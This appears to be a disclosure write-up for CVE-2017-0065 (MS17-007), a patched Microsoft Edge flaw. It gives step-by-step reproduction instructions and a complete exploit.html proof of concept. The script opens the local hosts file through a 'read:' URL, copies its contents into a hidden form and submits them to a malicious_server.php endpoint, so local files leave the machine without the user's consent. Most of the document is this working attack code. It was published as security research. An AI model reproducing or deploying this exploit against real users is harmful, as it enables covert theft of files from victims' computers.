This exploit was reported to Microsoft and I was acknowledged for doing so. The exploit has been patched on March 14th 2017 under names cve-2017-0065 and MS17-007 and will not work if related patches are applied. Sourcecode is provided for educational purposes only.
This exploit requires the victim has a forged file (exploit.html) on his file system on a known file location. Victim does not need to run it, just have it. The file can then be invoked by visiting a malicious website (malicious_server.php).
With this exploit local files may be uploaded to visited malicious websites without users consent.
Hereโs how to reproduce:
1. Edit exploit.html to have your test webservers address as the form action.
2. Serve malicious_server.php on a PHP enabled webserver, so you can access it with: http://yourwebserver.com/malicious_server.php
3. Place exploit.html into following folder: c:\windows\system32\drivers\etc\ (read: protocol seems picky about the file location)
4. Navigate to http://yourwebserver.com/malicious_server.php with Edge.
Hereโs what should happen:
1. Navigating to malicious_server.php should trigger browser redirect to: read:,c:\windows\system32\drivers\etc\exploit.html
2. exploit.html should then prompt user to click anywhere on the empty page.
3. After a click, exploit.html will create a window with url to: read:,c:\windows\system32\drivers\etc\hosts
4. If window creation succeeds, contents of opened window (hosts file) will be copied to a hidden form, window will be closed and the form submitted back to malicious_server.php on your webserver
5. malicious_server.php will display contents of the submitted file
ๅ
ทไฝ PoC ๅฏไปฅๅ่๏ผhttps://github.com/Dankirk/cve-2017-0065
<!doctype html>
<html>
<head><meta charset="UTF-8"></head>
<body>
<form id="xss_form" method="post" action="http://127.0.0.1/malicious_server.php">
<input id="xss" type="hidden" name="xss" value="">
</form>
Click anywhere to submit your hosts file
<script>
document.onclick = function(event) {
event.preventDefault();
// append a random value to prevent caching
var url = "read:,C:\\windows\\system32\\drivers\\etc\\hosts,"+Math.floor(Math.random() * 1000);
var w = window.open(url);
if (w) {
// Copy window contents, close and submit
// This is allowed because we are the same origin, since we are using subsequent read:, requests
document.getElementById("xss").value = w.document.body.innerHTML;
w.close();
document.getElementById("xss_form").submit();
}
else
document.body.innerHTML = "Popups are blocked :<";
}
</script>
</body>
</html>